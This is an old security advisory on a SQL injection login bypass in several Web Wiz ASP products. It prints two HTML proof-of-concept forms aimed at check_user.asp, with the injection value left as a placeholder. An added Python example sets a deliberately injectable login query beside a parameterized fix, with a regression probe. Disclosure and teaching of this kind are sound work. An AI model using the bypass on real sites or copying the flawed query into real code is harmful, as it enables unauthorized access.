

Title: Web Wiz Multiple Products SQL Injection Vulnerability
Published: 2005-12-30-12:00AM
Updated: 2005-12-30-04:27PM
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: No
Credit: Discovered by DevilBox of KAPDA.
Vulnerable:
  Web Wiz Site News Access 97 3.0 6
  Web Wiz Site News Access 2000 3.0 6
  Web Wiz Polls Access 97 3.0 6
  Web Wiz Polls Access 2000 3.0 6
  Web Wiz Journal Access 97 1.0
  Web Wiz Journal Access 2000 1.0
  Web Wiz Database Login Access 97 1.71
  Web Wiz Database Login Access 2000 1.71
Not Vulnerable:
Code: An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
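
Added example (not part of the original advisory and not Web Wiz code): a login check that builds its SQL by concatenating the txtUserName and txtUserPass form fields, next to the parameterized form, plus a regression probe that uses a legitimate name containing a quote to show whether input reaches the SQL parser. SQLite stands in for the Access database, and the table name tblUsers, the function names and the sample rows are assumptions constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the product's Access user table.
    tblUsers and its rows are hypothetical; real systems store salted
    password hashes, not plaintext."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO tblUsers VALUES (?, ?)",
                   [("admin", "s3cret"), ("O'Brien", "hunter2")])
    return db


def check_user_concat(db, txtUserName, txtUserPass):
    """Flawed pattern (assumed, typical of this bug class): form values
    are pasted into the SQL text, so they are parsed as part of the query."""
    sql = ("SELECT 1 FROM tblUsers WHERE username = '" + txtUserName +
           "' AND password = '" + txtUserPass + "'")
    return db.execute(sql).fetchone() is not None


def check_user_param(db, txtUserName, txtUserPass):
    """Hardened pattern: values are bound as parameters and are only ever
    compared as data, never parsed as SQL."""
    sql = "SELECT 1 FROM tblUsers WHERE username = ? AND password = ?"
    return db.execute(sql, (txtUserName, txtUserPass)).fetchone() is not None


def input_reaches_parser(db, check, name, password):
    """Regression probe: a legitimate name containing a quote must not
    raise a SQL syntax error. An error means the input changed the
    structure of the statement."""
    try:
        check(db, name, password)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    for fn in (check_user_concat, check_user_param):
        print(fn.__name__, "parses input as SQL:",
              input_reaches_parser(db, fn, "O'Brien", "hunter2"))
```

The same probe can run in a test suite against any login handler: a handler that fails on a quoted surname is building SQL from raw input and needs parameter binding, not just character filtering.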
Copyright 2007, SecurityDot